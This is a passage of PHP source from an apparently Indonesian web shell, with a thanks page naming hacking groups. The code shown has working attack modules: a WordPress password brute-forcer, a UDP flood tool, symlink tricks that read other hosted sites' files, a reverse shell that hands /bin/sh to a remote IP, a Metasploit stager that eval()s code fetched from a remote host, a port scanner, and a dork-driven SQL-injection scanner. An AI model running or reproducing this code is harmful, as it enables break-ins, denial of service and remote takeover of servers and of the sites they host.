show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
|
||
|
show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
|
||
|
}
|
||
|
}
|
||
|
preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
|
||
|
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
|
||
|
foreach($frontpathes as $frontpath) {
|
||
|
show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
|
||
|
$verificate++; show($verificate, 0, 0, 'verified', 1);
|
||
|
if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
|
||
|
else{
|
||
|
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
|
||
|
show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
|
||
|
}
|
||
|
|
||
|
}
|
||
|
}
|
||
|
//////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'wpbrute'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=wpbrute" method="post">
|
||
|
<center>
|
||
|
<br><Br><b><font size='2' >+--=[ Wordpress Brute Force ]=--+</font><br>
|
||
|
<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>
|
||
|
<form enctype="multipart/form-data" method="POST">
|
||
|
<table width='624' border='0' class='tabnet' id='Box'>
|
||
|
<tr><th colspan="5">Wordpress Brute Force</th></tr>
|
||
|
|
||
|
|
||
|
<tr>
|
||
|
<td > </td>
|
||
|
<td ><p>Hosts:</p></td>
|
||
|
<td ><p> Users:</p></td>
|
||
|
<td ><p>Passwords:</p></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td> </td>
|
||
|
<td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
|
||
|
<td ><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
|
||
|
<td ><textarea style="background:black;" name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
|
||
|
</tr>
|
||
|
<tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
|
||
|
<?php
|
||
|
if($_POST)
|
||
|
{
|
||
|
$hosts = trim(filter($_POST['hosts']));
|
||
|
$passwords = trim(filter($_POST['passwords']));
|
||
|
$usernames = trim(filter($_POST['usernames']));
|
||
|
|
||
|
if($passwords && $usernames && $hosts)
|
||
|
{
|
||
|
$hosts_explode = explode("\n", $hosts);
|
||
|
$usernames_explode = explode("\n", $usernames);
|
||
|
$passwords_explode = explode("\n", $passwords);
|
||
|
|
||
|
foreach($hosts_explode as $host)
|
||
|
{
|
||
|
$host = RemoveLastSlash($host);
|
||
|
$hacked = 0;
|
||
|
$host = str_replace(array("http://","https://","www."),"",trim($host));
|
||
|
$host = "http://".$host;
|
||
|
$wpAdmin = $host.'/wp-admin/';
|
||
|
|
||
|
if(!url_exists($host."/wp-login.php"))
|
||
|
{echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}
|
||
|
|
||
|
foreach($usernames_explode as $username)
|
||
|
{
|
||
|
foreach($passwords_explode as $password)
|
||
|
{
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
|
||
|
curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
|
||
|
curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
|
||
|
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
|
||
|
curl_setopt($ch,CURLOPT_POST,TRUE);
|
||
|
curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1");
|
||
|
$login = curl_exec($ch);
|
||
|
|
||
|
if(eregi ("profile.php",$login) )
|
||
|
{
|
||
|
$hacked = 1;
|
||
|
echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
|
||
|
ob_flush();flush();break;
|
||
|
}
|
||
|
}
|
||
|
if($hacked == 1){break;}
|
||
|
}
|
||
|
if($hacked == 0)
|
||
|
{echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
|
||
|
}
|
||
|
}
|
||
|
else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
|
||
|
}
|
||
|
?>
|
||
|
</td></tr>
|
||
|
</table></form></center>
|
||
|
<?php
|
||
|
function url_exists($strURL)
|
||
|
{
|
||
|
$resURL = curl_init();
|
||
|
curl_setopt($resURL, CURLOPT_URL, $strURL);
|
||
|
curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
|
||
|
curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
|
||
|
curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
|
||
|
curl_exec ($resURL);
|
||
|
$intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
|
||
|
curl_close ($resURL);
|
||
|
if ($intReturnCode != 200){return false;}
|
||
|
else{return true ;}
|
||
|
}
|
||
|
function filter($string)
|
||
|
{
|
||
|
if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
|
||
|
else{return $string; }
|
||
|
}
|
||
|
function RemoveLastSlash($host)
|
||
|
{
|
||
|
if(strrpos($host, '/', -1) == strlen($host)-1)
|
||
|
{return substr($host,0,strrpos($host, '/', -1));}
|
||
|
else{return $host;}
|
||
|
}
|
||
|
echo "</p>";
|
||
|
}
|
||
|
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=dos" method="post">
|
||
|
<center><br><br><br>
|
||
|
Your IP: <font color="red"><b><?php echo $my_ip; ?></b></font> (Don't DoS yourself nub)<br><br>
|
||
|
<table class="tabnet" style="width:333px;padding:0 1px;">
|
||
|
<th colspan="5">Ddos Tool</th>
|
||
|
<tr><tr><td>IP Target</td><td>:</td>
|
||
|
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
|
||
|
</td></tr>
|
||
|
<tr><td>Time</td><td>:</td>
|
||
|
<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
|
||
|
</td></tr>
|
||
|
|
||
|
<tr><td>Port</td><td>:</td>
|
||
|
<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
|
||
|
</td></tr></tr></table></b><br>
|
||
|
<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
|
||
|
<br><br>
|
||
|
<center>
|
||
|
After initiating the DoS attack, please wait while the browser loads.
|
||
|
</center>
|
||
|
|
||
|
</form>
|
||
|
</center>
|
||
|
<?php
|
||
|
$submit = $_POST['fire'];
|
||
|
if (isset($submit)) {
|
||
|
|
||
|
$packets = 0;
|
||
|
$ip = $_POST['ip'];
|
||
|
$rand = $_POST['port'];
|
||
|
set_time_limit(0);
|
||
|
ignore_user_abort(FALSE);
|
||
|
|
||
|
$exec_time = $_POST['time'];
|
||
|
|
||
|
$time = time();
|
||
|
print "Flooded: $ip on port $rand <br><br>";
|
||
|
$max_time = $time+$exec_time;
|
||
|
|
||
|
|
||
|
|
||
|
for($i=0;$i<65535;$i++){
|
||
|
$out .= "X";
|
||
|
}
|
||
|
while(1){
|
||
|
$packets++;
|
||
|
if(time() > $max_time){
|
||
|
break;
|
||
|
}
|
||
|
|
||
|
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
|
||
|
if($fp){
|
||
|
fwrite($fp, $out);
|
||
|
fclose($fp);
|
||
|
}
|
||
|
}
|
||
|
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
|
||
|
}
|
||
|
}
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=symlink" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
@set_time_limit(0);
|
||
|
|
||
|
echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
|
||
|
|
||
|
@mkdir('sym',0777);
|
||
|
$htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
|
||
|
$write =@fopen ('sym/.htaccess','w');
|
||
|
fwrite($write ,$htaccess);
|
||
|
@symlink('/','sym/root');
|
||
|
$filelocation = basename(__FILE__);
|
||
|
$read_named_conf = @file('/etc/named.conf');
|
||
|
if(!$read_named_conf)
|
||
|
{
|
||
|
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
|
||
|
foreach($read_named_conf as $subject){
|
||
|
if(eregi('zone',$subject)){
|
||
|
preg_match_all('#zone "(.*)"#',$subject,$string);
|
||
|
flush();
|
||
|
if(strlen(trim($string[1][0])) >2){
|
||
|
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
|
||
|
$name = $UID['name'] ;
|
||
|
@symlink('/','sym/root');
|
||
|
$name = $string[1][0];
|
||
|
$iran = '\.ir';
|
||
|
$israel = '\.il';
|
||
|
$indo = '\.id';
|
||
|
$sg12 = '\.sg';
|
||
|
$edu = '\.edu';
|
||
|
$gov = '\.gov';
|
||
|
$gose = '\.go';
|
||
|
$gober = '\.gob';
|
||
|
$mil1 = '\.mil';
|
||
|
$mil2 = '\.mi';
|
||
|
$malay = '\.my';
|
||
|
$china = '\.cn';
|
||
|
$japan = '\.jp';
|
||
|
$austr = '\.au';
|
||
|
$porn = '\.xxx';
|
||
|
$as = '\.uk';
|
||
|
$calfn = '\.ca';
|
||
|
|
||
|
if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
|
||
|
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
|
||
|
or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
|
||
|
or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
|
||
|
{
|
||
|
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
|
||
|
}
|
||
|
echo "
|
||
|
<tr>
|
||
|
|
||
|
<td>
|
||
|
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
|
||
|
</td>
|
||
|
|
||
|
<td>
|
||
|
'.$UID['name']."
|
||
|
</td>
|
||
|
|
||
|
<td>
|
||
|
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
|
||
|
</td>
|
||
|
|
||
|
</tr></div> ";
|
||
|
flush();
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
echo "</center></table>";
|
||
|
|
||
|
}
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'domain'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=domain" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
echo '<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>';
|
||
|
|
||
|
$file = @implode(@file("/etc/named.conf"));
|
||
|
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
|
||
|
preg_match_all("#named/(.*?).db#",$file ,$r);
|
||
|
$domains = array_unique($r[1]);
|
||
|
//check();
|
||
|
//if(isset($_GET['ShowAll']))
|
||
|
{
|
||
|
echo "<table align=center border=1 width=59% cellpadding=5>
|
||
|
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
|
||
|
<tr><td>Domain</td><td>User</td></tr>";
|
||
|
foreach($domains as $domain){
|
||
|
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
|
||
|
|
||
|
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
|
||
|
}
|
||
|
echo "</table>";
|
||
|
}
|
||
|
|
||
|
echo '</div>';
|
||
|
}
|
||
|
//////////////////////////////////////////////////////
|
||
|
/////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'tool'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=tool" method="post">
|
||
|
<?php
|
||
|
|
||
|
error_reporting(0);
|
||
|
function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
|
||
|
$s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
|
||
|
echo $s_result;
|
||
|
if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
|
||
|
if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
|
||
|
if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
|
||
|
if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
|
||
|
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
|
||
|
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
|
||
|
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
|
||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||
|
if(!is_resource($process)) exit(1);
|
||
|
stream_set_blocking($pipes[0], 0);
|
||
|
stream_set_blocking($pipes[1], 0);
|
||
|
stream_set_blocking($pipes[2], 0);
|
||
|
stream_set_blocking($sock, 0);
|
||
|
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||
|
if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
|
||
|
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
|
||
|
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
|
||
|
}
|
||
|
////////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'whois'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
|
||
|
<?php
|
||
|
@set_time_limit(0);
|
||
|
@error_reporting(0);
|
||
|
function sws_domain_info($site)
|
||
|
{
|
||
|
$getip = @file_get_contents("http://networktools.nl/whois/$site");
|
||
|
flush();
|
||
|
$ip = @findit($getip,'<pre>','</pre>');
|
||
|
return $ip;
|
||
|
flush();
|
||
|
}
|
||
|
function sws_net_info($site)
|
||
|
{
|
||
|
$getip = @file_get_contents("http://networktools.nl/asinfo/$site");
|
||
|
$ip = @findit($getip,'<pre>','</pre>');
|
||
|
return $ip;
|
||
|
flush();
|
||
|
}
|
||
|
function sws_site_ser($site)
|
||
|
{
|
||
|
$getip = @file_get_contents("http://networktools.nl/reverseip/$site");
|
||
|
$ip = @findit($getip,'<pre>','</pre>');
|
||
|
return $ip;
|
||
|
flush();
|
||
|
}
|
||
|
function sws_sup_dom($site)
|
||
|
{
|
||
|
$getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
|
||
|
$ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
|
||
|
return $ip;
|
||
|
flush();
|
||
|
}
|
||
|
function sws_port_scan($ip)
|
||
|
{
|
||
|
$list_post = array('80','21','22','2082','25','53','110','443','143');
|
||
|
foreach ($list_post as $o_port)
|
||
|
{
|
||
|
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
|
||
|
if($connect)
|
||
|
{
|
||
|
echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
|
||
|
flush();
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
function findit($mytext,$starttag,$endtag) {
|
||
|
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
|
||
|
$posRight = @stripos($mytext,$endtag,$posLeft+1);
|
||
|
return @substr($mytext,$posLeft,$posRight-$posLeft);
|
||
|
flush();
|
||
|
}
|
||
|
echo '<br><br><center>';
|
||
|
echo '
|
||
|
<br />
|
||
|
<div class="sc"><form method="post"><table class="tabnet">
|
||
|
<tr><th colspan="5">Website Whois</th></tr>
|
||
|
<tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" />   <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>
|
||
|
</table></form></div>';
|
||
|
if(isset($_POST['scan']))
|
||
|
{
|
||
|
$site = @htmlentities($_POST['site']);
|
||
|
if (empty($site)){die('<br /><br /> Not add IP .. !');}
|
||
|
$ip_port = @gethostbyname($site);
|
||
|
echo "
|
||
|
<br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
|
||
|
<div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
|
||
|
<div class=\"ru\"> <br /><br /><pre>
|
||
|
";
|
||
|
echo "".sws_port_scan($ip_port)." </pre></div> ";
|
||
|
flush();
|
||
|
echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
|
||
|
<div class=\"ru\">
|
||
|
<pre>".sws_domain_info($site)."</pre></div>";
|
||
|
flush();
|
||
|
echo "
|
||
|
<div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
|
||
|
<div class=\"ru\">
|
||
|
<pre>".sws_net_info($site)."</pre> </div>";
|
||
|
flush();
|
||
|
echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
|
||
|
<div class=\"ru\">
|
||
|
<pre>".sws_sup_dom($site)."</pre> </div>";
|
||
|
flush();
|
||
|
echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
|
||
|
<div class=\"ru\">
|
||
|
<pre>".sws_site_ser($site)."</pre> </div>
|
||
|
<div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
|
||
|
flush();
|
||
|
}
|
||
|
echo '</center>';
|
||
|
}
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=about" method="post">
|
||
|
<center><br><br><img src='http://i.imgur.com/3m7leCw.jpg'>
|
||
|
<br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini
|
||
|
<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku
|
||
|
<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>
|
||
|
<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>
|
||
|
<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>
|
||
|
Uyap<br>
|
||
|
Zinbad<br>FH04ZA<br>
|
||
|
Sani marpic<br>
|
||
|
Madan Cyber<br>
|
||
|
Cah Bagus<br>
|
||
|
RPG<br>Vallent<br>
|
||
|
P4njie_a.k.a<br>
|
||
|
Dwi Syntia<br>
|
||
|
Ærul Ringgo's<br>
|
||
|
Ti'ar Variabel<br>
|
||
|
Imei7<br>
|
||
|
Hmei7<br>
|
||
|
De Vinclous<br>
|
||
|
Blankon33<br>
|
||
|
Doza Cracker<br>
|
||
|
Ying Cracker<br>
|
||
|
Iranian Hacker<br>
|
||
|
Danger Hacker<br>
|
||
|
Admin07<br>
|
||
|
Zhou you<br>
|
||
|
Ksatria.us<br>
|
||
|
Cyber Inj3cti0n<br>
|
||
|
K2ll33d<br>
|
||
|
Sultan Haikal<br>
|
||
|
Syntax_Error<br>
|
||
|
Aqis<br>
|
||
|
Black Shadow<br>
|
||
|
crack999<br>
|
||
|
Fnatic Crew<br>
|
||
|
Coretan Rizal<br>
|
||
|
Malaikat Maut<br>
|
||
|
Dan teman-teman ku semua<br><br>
|
||
|
=[ grup hacking ]=<br><br>
|
||
|
Black Newbie Team<br>
|
||
|
3xpire Cyber Army<br>
|
||
|
Hack Forum<br>
|
||
|
Indonesia Fighter Cyber<br>
|
||
|
Biang Kerox Team<br>
|
||
|
Anonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>
|
||
|
X-Code<br>
|
||
|
Indonesian Security<br>
|
||
|
Indonesia Black Cyber<br>
|
||
|
B-Compi<br>
|
||
|
Jasakom<br>
|
||
|
Mojopahit Fighter Cyber<br>
|
||
|
Lappis<br>
|
||
|
Mojopahit Cyber Dark<br>
|
||
|
Crack Hack Forum<br>
|
||
|
dan semua grup hacking<br>
|
||
|
yang<br>
|
||
|
saya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X'1n73ct<br><br><br>
|
||
|
</font></b></p>
|
||
|
</center>
|
||
|
</marquee></center><br><br><br>
|
||
|
<?php
|
||
|
}
|
||
|
//////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=sqli-scanner" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
echo '<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> <input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>';
|
||
|
|
||
|
ob_start();
|
||
|
set_time_limit(0);
|
||
|
|
||
|
if (isset($_POST['scan'])) {
|
||
|
|
||
|
$browser = $_SERVER['HTTP_USER_AGENT'];
|
||
|
|
||
|
$first = "startgoogle.startpagina.nl/index.php?q=";
|
||
|
$sec = "&start=";
|
||
|
$reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
|
||
|
|
||
|
for($id=0 ; $id<=30; $id++){
|
||
|
$page=$id*10;
|
||
|
$dork=urlencode($_POST['dork']);
|
||
|
$url = $first.$dork.$sec.$page;
|
||
|
|
||
|
$curl = curl_init($url);
|
||
|
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||
|
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
|
||
|
$result = curl_exec($curl);
|
||
|
curl_close($curl);
|
||
|
|
||
|
preg_match_all($reg,$result,$matches);
|
||
|
}
|
||
|
foreach($matches[1] as $site){
|
||
|
|
||
|
$url = preg_replace("/=/", "='", $site);
|
||
|
$curl=curl_init();
|
||
|
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($curl,CURLOPT_URL,$url);
|
||
|
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
|
||
|
curl_setopt($curl,CURLOPT_TIMEOUT,'5');
|
||
|
$GET=curl_exec($curl);
|
||
|
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *
|
||
|
|
||
|
FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
|
||
|
echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
|
||
|
|
||
|
Found..</font></b></center>';
|
||
|
ob_flush();flush();
|
||
|
}else{
|
||
|
echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> <-- Not Vuln</font></center>';
|
||
|
ob_flush();flush();
|
||
|
}
|
||
|
ob_flush();flush();
|
||
|
}
|
||
|
ob_flush();flush();
|
||
|
}
|
||
|
ob_flush();flush();
|
||
|
}
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
|
||
|
if(isset($_POST['uploadcomp'])){
|
||
|
if(is_uploaded_file($_FILES['file']['tmp_name'])){
|
||
|
$path = magicboom($_POST['path']);
|
||
|
$fname = $_FILES['file']['name'];
|
||
|
$tmp_name = $_FILES['file']['tmp_name'];
|
||
|
$pindah = $path.$fname;
|
||
|
$stat = @move_uploaded_file($tmp_name,$pindah);
|
||
|
if ($stat) {
|
||
|
$msg = "file uploaded to $pindah";
|
||
|
}
|
||
|
else $msg = "failed to upload $fname";
|
||
|
}
|
||
|
else $msg = "failed to upload $fname";
|
||
|
}
|
||
|
elseif(isset($_POST['uploadurl'])){
|
||
|
$pilihan = trim($_POST['pilihan']);
|
||
|
$wurl = trim($_POST['wurl']);
|
||
|
$path = magicboom($_POST['path']);
|
||
|
$namafile = download($pilihan,$wurl);
|
||
|
$pindah = $path.$namafile;
|
||
|
if(is_file($pindah)) {
|
||
|
$msg = "file uploaded to $pindah";
|
||
|
}
|
||
|
else $msg = "failed to upload $namafile";
|
||
|
|
||
|
}
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
|
||
|
<table class="tabnet" style="width:320px;padding:0 1px;">
|
||
